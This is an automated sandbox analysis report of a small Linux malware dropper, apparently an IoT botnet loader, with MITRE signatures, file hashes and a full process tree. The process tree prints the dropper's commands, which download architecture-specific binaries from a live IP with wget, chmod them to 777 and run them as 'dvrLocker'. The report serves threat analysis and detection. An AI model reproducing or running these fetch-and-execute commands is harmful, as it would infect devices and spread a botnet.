Analysis
-
max time kernel
13s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
27/11/2024, 02:39
Static task
static1
Behavioral task
behavioral1
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-mipsel-20240226-en
General
-
Target
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
-
Size
913B
-
MD5
c18ef2271ad912c7542293151373ffa0
-
SHA1
65fb65c17671657fc431173051fe794c6c63007d
-
SHA256
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b
-
SHA512
fb9a3ec37ee5f8f71b343285f034a6c27520fdc6525b217b411023b4c9741282cd36354442853caa50a2d2fe54dfb6e8f8453f36cdd773573435062f82bcdfc9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1754 chmod 1673 chmod 1688 chmod 1693 chmod 1709 chmod 1734 chmod 1744 chmod 1749 chmod 1764 chmod 1769 chmod 1667 chmod 1678 chmod 1698 chmod 1704 chmod 1724 chmod 1714 chmod 1719 chmod 1739 chmod 1683 chmod 1729 chmod 1759 chmod -
Executes dropped EXE 21 IoCs
ioc pid Process /tmp/lib/dvrLocker 1668 dvrLocker /tmp/lib/dvrLocker 1674 dvrLocker /tmp/lib/dvrLocker 1679 dvrLocker /tmp/lib/dvrLocker 1684 dvrLocker /tmp/lib/dvrLocker 1689 dvrLocker /tmp/lib/dvrLocker 1694 dvrLocker /tmp/lib/dvrLocker 1699 dvrLocker /mnt/dvrLocker 1705 dvrLocker /mnt/dvrLocker 1710 dvrLocker /mnt/dvrLocker 1715 dvrLocker /mnt/dvrLocker 1720 dvrLocker /mnt/dvrLocker 1725 dvrLocker /mnt/dvrLocker 1730 dvrLocker /mnt/dvrLocker 1735 dvrLocker /mnt/dvrLocker 1740 dvrLocker /mnt/dvrLocker 1745 dvrLocker /mnt/dvrLocker 1750 dvrLocker /mnt/dvrLocker 1755 dvrLocker /mnt/dvrLocker 1760 dvrLocker /mnt/dvrLocker 1765 dvrLocker /mnt/dvrLocker 1770 dvrLocker -
description ioc Process File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1671 wget 1676 rm 1708 wget 1712 rm 1743 wget 1747 rm -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/lib/dvrLocker 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Processes
-
/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown1⤵
- Writes file to tmp directory
PID:1480 -
/bin/lsls -l /proc/1/exe2⤵
- Reads runtime system information
PID:1481
-
-
/bin/lsls -l /proc/10/exe2⤵PID:1483
-
-
/bin/lsls -l /proc/1012/exe2⤵PID:1484
-
-
/bin/lsls -l /proc/1017/exe2⤵PID:1485
-
-
/bin/lsls -l /proc/1041/exe2⤵PID:1486
-
-
/bin/lsls -l /proc/1047/exe2⤵PID:1487
-
-
/bin/lsls -l /proc/1061/exe2⤵PID:1488
-
-
/bin/lsls -l /proc/1065/exe2⤵
- Reads runtime system information
PID:1489
-
-
/bin/lsls -l /proc/1067/exe2⤵PID:1490
-
-
/bin/lsls -l /proc/1070/exe2⤵PID:1491
-
-
/bin/lsls -l /proc/1077/exe2⤵
- Reads runtime system information
PID:1492
-
-
/bin/lsls -l /proc/108/exe2⤵PID:1494
-
-
/bin/lsls -l /proc/1084/exe2⤵PID:1497
-
-
/bin/lsls -l /proc/1088/exe2⤵PID:1498
-
-
/bin/lsls -l /proc/1097/exe2⤵PID:1499
-
-
/bin/lsls -l /proc/11/exe2⤵PID:1500
-
-
/bin/lsls -l /proc/1112/exe2⤵
- Reads runtime system information
PID:1501
-
-
/bin/lsls -l /proc/1113/exe2⤵PID:1502
-
-
/bin/lsls -l /proc/1121/exe2⤵PID:1503
-
-
/bin/lsls -l /proc/1125/exe2⤵
- Reads runtime system information
PID:1504
-
-
/bin/lsls -l /proc/1129/exe2⤵
- Reads runtime system information
PID:1505
-
-
/bin/lsls -l /proc/1134/exe2⤵
- Reads runtime system information
PID:1506
-
-
/bin/lsls -l /proc/1138/exe2⤵PID:1507
-
-
/bin/lsls -l /proc/1143/exe2⤵PID:1508
-
-
/bin/lsls -l /proc/1146/exe2⤵PID:1509
-
-
/bin/lsls -l /proc/1148/exe2⤵PID:1510
-
-
/bin/lsls -l /proc/1151/exe2⤵
- Reads runtime system information
PID:1511
-
-
/bin/lsls -l /proc/1152/exe2⤵
- Reads runtime system information
PID:1512
-
-
/bin/lsls -l /proc/1154/exe2⤵PID:1513
-
-
/bin/lsls -l /proc/116/exe2⤵
- Reads runtime system information
PID:1514
-
-
/bin/lsls -l /proc/1162/exe2⤵
- Reads runtime system information
PID:1515
-
-
/bin/lsls -l /proc/1165/exe2⤵PID:1516
-
-
/bin/lsls -l /proc/1166/exe2⤵PID:1517
-
-
/bin/lsls -l /proc/1168/exe2⤵PID:1518
-
-
/bin/lsls -l /proc/1173/exe2⤵PID:1519
-
-
/bin/lsls -l /proc/1178/exe2⤵PID:1520
-
-
/bin/lsls -l /proc/1182/exe2⤵PID:1521
-
-
/bin/lsls -l /proc/1184/exe2⤵
- Reads runtime system information
PID:1522
-
-
/bin/lsls -l /proc/1186/exe2⤵PID:1523
-
-
/bin/lsls -l /proc/1188/exe2⤵
- Reads runtime system information
PID:1524
-
-
/bin/lsls -l /proc/1191/exe2⤵PID:1525
-
-
/bin/lsls -l /proc/1194/exe2⤵
- Reads runtime system information
PID:1526
-
-
/bin/lsls -l /proc/12/exe2⤵
- Reads runtime system information
PID:1527
-
-
/bin/lsls -l /proc/1229/exe2⤵PID:1528
-
-
/bin/lsls -l /proc/1239/exe2⤵PID:1529
-
-
/bin/lsls -l /proc/1250/exe2⤵PID:1530
-
-
/bin/lsls -l /proc/1252/exe2⤵PID:1531
-
-
/bin/lsls -l /proc/1266/exe2⤵
- Reads runtime system information
PID:1532
-
-
/bin/lsls -l /proc/1285/exe2⤵PID:1533
-
-
/bin/lsls -l /proc/1286/exe2⤵
- Reads runtime system information
PID:1534
-
-
/bin/lsls -l /proc/1293/exe2⤵
- Reads runtime system information
PID:1535
-
-
/bin/lsls -l /proc/13/exe2⤵PID:1536
-
-
/bin/lsls -l /proc/130/exe2⤵
- Reads runtime system information
PID:1538
-
-
/bin/lsls -l /proc/1303/exe2⤵
- Reads runtime system information
PID:1540
-
-
/bin/lsls -l /proc/1308/exe2⤵
- Reads runtime system information
PID:1542
-
-
/bin/lsls -l /proc/1319/exe2⤵PID:1543
-
-
/bin/lsls -l /proc/1331/exe2⤵PID:1544
-
-
/bin/lsls -l /proc/1341/exe2⤵PID:1545
-
-
/bin/lsls -l /proc/1348/exe2⤵PID:1546
-
-
/bin/lsls -l /proc/1370/exe2⤵
- Reads runtime system information
PID:1547
-
-
/bin/lsls -l /proc/14/exe2⤵
- Reads runtime system information
PID:1548
-
-
/bin/lsls -l /proc/1469/exe2⤵PID:1549
-
-
/bin/lsls -l /proc/1475/exe2⤵PID:1550
-
-
/bin/lsls -l /proc/1476/exe2⤵PID:1551
-
-
/bin/lsls -l /proc/1477/exe2⤵
- Reads runtime system information
PID:1552
-
-
/bin/lsls -l /proc/1478/exe2⤵PID:1553
-
-
/bin/lsls -l /proc/1480/exe2⤵PID:1554
-
-
/bin/lsls -l /proc/15/exe2⤵PID:1555
-
-
/bin/lsls -l /proc/16/exe2⤵PID:1556
-
-
/bin/lsls -l /proc/163/exe2⤵
- Reads runtime system information
PID:1557
-
-
/bin/lsls -l /proc/164/exe2⤵PID:1558
-
-
/bin/lsls -l /proc/165/exe2⤵PID:1559
-
-
/bin/lsls -l /proc/166/exe2⤵PID:1560
-
-
/bin/lsls -l /proc/167/exe2⤵PID:1561
-
-
/bin/lsls -l /proc/168/exe2⤵PID:1562
-
-
/bin/lsls -l /proc/169/exe2⤵PID:1563
-
-
/bin/lsls -l /proc/17/exe2⤵PID:1564
-
-
/bin/lsls -l /proc/170/exe2⤵PID:1565
-
-
/bin/lsls -l /proc/171/exe2⤵PID:1566
-
-
/bin/lsls -l /proc/172/exe2⤵PID:1567
-
-
/bin/lsls -l /proc/173/exe2⤵
- Reads runtime system information
PID:1568
-
-
/bin/lsls -l /proc/174/exe2⤵PID:1571
-
-
/bin/lsls -l /proc/175/exe2⤵PID:1572
-
-
/bin/lsls -l /proc/176/exe2⤵PID:1574
-
-
/bin/lsls -l /proc/177/exe2⤵PID:1575
-
-
/bin/lsls -l /proc/178/exe2⤵
- Reads runtime system information
PID:1578
-
-
/bin/lsls -l /proc/179/exe2⤵
- Reads runtime system information
PID:1580
-
-
/bin/lsls -l /proc/18/exe2⤵PID:1581
-
-
/bin/lsls -l /proc/181/exe2⤵
- Reads runtime system information
PID:1582
-
-
/bin/lsls -l /proc/19/exe2⤵
- Reads runtime system information
PID:1583
-
-
/bin/lsls -l /proc/2/exe2⤵PID:1584
-
-
/bin/lsls -l /proc/20/exe2⤵PID:1585
-
-
/bin/lsls -l /proc/206/exe2⤵
- Reads runtime system information
PID:1586
-
-
/bin/lsls -l /proc/207/exe2⤵PID:1587
-
-
/bin/lsls -l /proc/21/exe2⤵
- Reads runtime system information
PID:1588
-
-
/bin/lsls -l /proc/22/exe2⤵
- Reads runtime system information
PID:1589
-
-
/bin/lsls -l /proc/23/exe2⤵PID:1590
-
-
/bin/lsls -l /proc/24/exe2⤵PID:1591
-
-
/bin/lsls -l /proc/25/exe2⤵PID:1592
-
-
/bin/lsls -l /proc/255/exe2⤵PID:1593
-
-
/bin/lsls -l /proc/26/exe2⤵
- Reads runtime system information
PID:1594
-
-
/bin/lsls -l /proc/27/exe2⤵PID:1595
-
-
/bin/lsls -l /proc/276/exe2⤵PID:1596
-
-
/bin/lsls -l /proc/28/exe2⤵PID:1597
-
-
/bin/lsls -l /proc/29/exe2⤵PID:1598
-
-
/bin/lsls -l /proc/3/exe2⤵PID:1599
-
-
/bin/lsls -l /proc/30/exe2⤵PID:1600
-
-
/bin/lsls -l /proc/31/exe2⤵
- Reads runtime system information
PID:1601
-
-
/bin/lsls -l /proc/32/exe2⤵PID:1602
-
-
/bin/lsls -l /proc/334/exe2⤵
- Reads runtime system information
PID:1603
-
-
/bin/lsls -l /proc/336/exe2⤵
- Reads runtime system information
PID:1604
-
-
/bin/lsls -l /proc/34/exe2⤵PID:1605
-
-
/bin/lsls -l /proc/35/exe2⤵PID:1606
-
-
/bin/lsls -l /proc/36/exe2⤵PID:1607
-
-
/bin/lsls -l /proc/4/exe2⤵
- Reads runtime system information
PID:1608
-
-
/bin/lsls -l /proc/415/exe2⤵PID:1609
-
-
/bin/lsls -l /proc/421/exe2⤵
- Reads runtime system information
PID:1610
-
-
/bin/lsls -l /proc/425/exe2⤵
- Reads runtime system information
PID:1611
-
-
/bin/lsls -l /proc/433/exe2⤵
- Reads runtime system information
PID:1612
-
-
/bin/lsls -l /proc/439/exe2⤵
- Reads runtime system information
PID:1613
-
-
/bin/lsls -l /proc/440/exe2⤵
- Reads runtime system information
PID:1614
-
-
/bin/lsls -l /proc/441/exe2⤵PID:1615
-
-
/bin/lsls -l /proc/444/exe2⤵
- Reads runtime system information
PID:1616
-
-
/bin/lsls -l /proc/451/exe2⤵
- Reads runtime system information
PID:1617
-
-
/bin/lsls -l /proc/457/exe2⤵PID:1618
-
-
/bin/lsls -l /proc/462/exe2⤵
- Reads runtime system information
PID:1619
-
-
/bin/lsls -l /proc/464/exe2⤵
- Reads runtime system information
PID:1620
-
-
/bin/lsls -l /proc/465/exe2⤵PID:1621
-
-
/bin/lsls -l /proc/466/exe2⤵PID:1622
-
-
/bin/lsls -l /proc/468/exe2⤵
- Reads runtime system information
PID:1623
-
-
/bin/lsls -l /proc/485/exe2⤵PID:1624
-
-
/bin/lsls -l /proc/5/exe2⤵PID:1625
-
-
/bin/lsls -l /proc/515/exe2⤵
- Reads runtime system information
PID:1626
-
-
/bin/lsls -l /proc/518/exe2⤵
- Reads runtime system information
PID:1627
-
-
/bin/lsls -l /proc/524/exe2⤵
- Reads runtime system information
PID:1628
-
-
/bin/lsls -l /proc/532/exe2⤵PID:1629
-
-
/bin/lsls -l /proc/544/exe2⤵PID:1630
-
-
/bin/lsls -l /proc/568/exe2⤵
- Reads runtime system information
PID:1631
-
-
/bin/lsls -l /proc/595/exe2⤵
- Reads runtime system information
PID:1632
-
-
/bin/lsls -l /proc/596/exe2⤵PID:1633
-
-
/bin/lsls -l /proc/6/exe2⤵PID:1634
-
-
/bin/lsls -l /proc/632/exe2⤵
- Reads runtime system information
PID:1635
-
-
/bin/lsls -l /proc/650/exe2⤵PID:1636
-
-
/bin/lsls -l /proc/652/exe2⤵PID:1637
-
-
/bin/lsls -l /proc/662/exe2⤵PID:1638
-
-
/bin/lsls -l /proc/665/exe2⤵PID:1639
-
-
/bin/lsls -l /proc/670/exe2⤵
- Reads runtime system information
PID:1640
-
-
/bin/lsls -l /proc/7/exe2⤵PID:1641
-
-
/bin/lsls -l /proc/708/exe2⤵
- Reads runtime system information
PID:1642
-
-
/bin/lsls -l /proc/712/exe2⤵
- Reads runtime system information
PID:1643
-
-
/bin/lsls -l /proc/716/exe2⤵
- Reads runtime system information
PID:1644
-
-
/bin/lsls -l /proc/78/exe2⤵PID:1645
-
-
/bin/lsls -l /proc/79/exe2⤵
- Reads runtime system information
PID:1646
-
-
/bin/lsls -l /proc/8/exe2⤵
- Reads runtime system information
PID:1647
-
-
/bin/lsls -l /proc/80/exe2⤵
- Reads runtime system information
PID:1648
-
-
/bin/lsls -l /proc/81/exe2⤵
- Reads runtime system information
PID:1649
-
-
/bin/lsls -l /proc/82/exe2⤵PID:1650
-
-
/bin/lsls -l /proc/83/exe2⤵PID:1651
-
-
/bin/lsls -l /proc/84/exe2⤵PID:1652
-
-
/bin/lsls -l /proc/85/exe2⤵PID:1653
-
-
/bin/lsls -l /proc/867/exe2⤵
- Reads runtime system information
PID:1654
-
-
/bin/lsls -l /proc/89/exe2⤵PID:1655
-
-
/bin/lsls -l /proc/9/exe2⤵
- Reads runtime system information
PID:1656
-
-
/bin/lsls -l /proc/917/exe2⤵PID:1657
-
-
/bin/lsls -l /proc/934/exe2⤵PID:1658
-
-
/bin/lsls -l /proc/949/exe2⤵PID:1659
-
-
/bin/lsls -l /proc/962/exe2⤵PID:1660
-
-
/bin/lsls -l /proc/968/exe2⤵PID:1661
-
-
/bin/lsls -l /proc/98/exe2⤵PID:1662
-
-
/bin/rmrm -rf /tmp/lib/2⤵PID:1663
-
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:1664
-
-
/bin/mkdirmkdir /tmp/lib/2⤵PID:1665
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:1666
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm -rf mpsl2⤵PID:1670
-
-
/usr/bin/wgetwget http://45.125.66.90/mips -O -2⤵
- System Network Configuration Discovery
PID:1671
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1673
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1674
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:1676
-
-
/usr/bin/wgetwget http://45.125.66.90/arm -O -2⤵PID:1677
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1678
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1679
-
-
/bin/rmrm -rf arm2⤵PID:1681
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:1682
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1683
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1684
-
-
/bin/rmrm -rf arm52⤵PID:1686
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:1687
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1688
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1689
-
-
/bin/rmrm -rf ppc2⤵PID:1691
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:1692
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1693
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1694
-
-
/bin/rmrm -rf arm72⤵PID:1696
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:1697
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1698
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1699
-
-
/bin/rmrm -rf arm62⤵PID:1701
-
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:1702
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:1703
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1704
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1705
-
-
/bin/rmrm -rf mpsl2⤵PID:1707
-
-
/usr/bin/wgetwget http://45.125.66.90/mips -O -2⤵
- System Network Configuration Discovery
PID:1708
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1709
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1710
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:1712
-
-
/usr/bin/wgetwget http://45.125.66.90/arm -O -2⤵PID:1713
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1714
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1715
-
-
/bin/rmrm -rf arm2⤵PID:1717
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:1718
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1719
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1720
-
-
/bin/rmrm -rf arm52⤵PID:1722
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:1723
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1724
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1725
-
-
/bin/rmrm -rf ppc2⤵PID:1727
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:1728
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1729
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1730
-
-
/bin/rmrm -rf arm72⤵PID:1732
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:1733
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1734
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1735
-
-
/bin/rmrm -rf arm62⤵PID:1737
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:1738
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1739
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1740
-
-
/bin/rmrm -rf mpsl2⤵PID:1742
-
-
/usr/bin/wgetwget http://45.125.66.90/mips -O -2⤵
- System Network Configuration Discovery
PID:1743
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1744
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1745
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:1747
-
-
/usr/bin/wgetwget http://45.125.66.90/arm -O -2⤵PID:1748
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1749
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1750
-
-
/bin/rmrm -rf arm2⤵PID:1752
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:1753
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1754
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1755
-
-
/bin/rmrm -rf arm52⤵PID:1757
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:1758
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1759
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1760
-
-
/bin/rmrm -rf ppc2⤵PID:1762
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:1763
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1764
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1765
-
-
/bin/rmrm -rf arm72⤵PID:1767
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:1768
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1769
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1770
-
-
/bin/rmrm -rf arm62⤵PID:1772
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102KB
MD545c898246a8ffe0b7cc20fe25669da04
SHA15ae935186b80f6beb84926d57337d5c0b9e3e1fc
SHA2561b0846e58fbb6a0e72d25edb81ec94961c0c7048a4e6f26876660f5a26675c77
SHA512ca75fb8ae0aa7977132c2888ff226f712f4e66f542ab121bcffdc3b3a912b906870b55d6415dfc60c133574739a71c1e5177418dd275d208f43d6ffc09c14636
-
Filesize
100KB
MD54ad582d49f505bfab7de84881998685b
SHA15f09f4baed114b594729ded91e2c4d263f0e2754
SHA256b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA5126f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
-
Filesize
99KB
MD5559f129d380ad1cfb60792c6b2dc3d32
SHA13997a0fc0bd5958783f1751364ec407c5b170adc
SHA256fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA5129f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112
-
Filesize
77KB
MD5d09db60a70d5b53b5b53ad39476fd7e8
SHA173a75e5e8200f77d857a7256cc0979077e29241d
SHA25636b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04
-
Filesize
73KB
MD5f812a7b3a877f717eb6e54b843b41848
SHA121ee67d9a9b638621646e1b57fdc0f1eb0bdfa25
SHA2569a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560
SHA512c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732
-
Filesize
75KB
MD5c6f057c974b24f6abdac5b76b10040b9
SHA180295c6fdf8fff202829732e58428d656b38f6bd
SHA2564e114c1111ecdaf0a7622a347c025cd3f9584be170b129113d836a2a5a7c169f
SHA51223a3bda5842b7e4e0abb6601c5c692d88ebe70c9ebe292d58ee5731aa34647b277ba46b893bcc2481be510442170118e29294a604c6ec296a2712316d09261e6
-
Filesize
102KB
MD5b1a1559b205459098f1fff627d35c808
SHA1983f62052375084a8c125353e0c25b7cd19bd369
SHA256e4837942ba2584de61bc3a75eba74f4eb0a137a7807130553c42d470c3ec01da
SHA5123bb8ec38b6f3d17f7c7307785f609031b30056da380377bce27bdd48678cbbc81c4b7203ff511794ec6d23644952a82fa471e13149c014a91378f08305e6f60d